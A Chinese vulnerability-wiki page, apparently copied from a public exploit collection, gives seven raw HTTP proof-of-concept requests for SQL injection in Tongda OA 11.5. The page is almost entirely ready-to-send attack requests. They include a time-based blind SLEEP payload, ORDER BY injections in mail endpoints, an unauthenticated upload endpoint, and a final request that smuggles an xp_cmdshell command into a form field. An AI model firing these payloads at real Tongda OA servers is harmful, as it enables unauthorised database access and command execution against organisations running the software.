menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 通达oa chevron_right 通达oa 11.5 sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    通达oa 11.5 sql注入漏洞.md
    5.71 KB / 2021-04-21 09:23:46
        通达oa 11.5 sql注入漏洞
=======================

一、漏洞简介
------------

### 利用条件:

一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。

二、漏洞影响
------------

通达oa 11.5

三、复现过程
------------

### poc 一

    POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: https://www.0-sec.org/portal/home/
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Connection: keep-alive
    Host: www.0-sec.org
    Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 154
    X-WVS-ID: Acunetix-Autologin/65535
    Cache-Control: no-cache
    Accept: */*
    Origin: https://www.0-sec.org
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8

    starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

### poc 二

    GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.0-sec.org/
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Connection: close

### poc 三

    GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.0-sec.org
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Connection: close

### poc 四

    GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.0-sec.org
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Connection: close

### poc 五

> 无需登陆

    POST /general/file_folder/swfupload_new.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/
    Connection: close
    Host: 192.168.202.1
    Content-Length: 391
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2

    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_ID"

    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_NAME"

    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="FILE_SORT"

    2
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="SORT_ID"

    ------------GFioQpMK0vv2--

### poc 六

> 会过滤掉:空格、制表符、换行符、回车符、垂直制表符等。只能报错,或尝试
> and 等语句判断还是没有问题的。

    POST /general/file_folder/api.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 82
    x-wvs-id: Acunetix-Deepscan/209
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8

    CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign

### poc 七

    POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 97
    x-wvs-id: Acunetix-Deepscan/186
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8

    m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--
    links
    file_download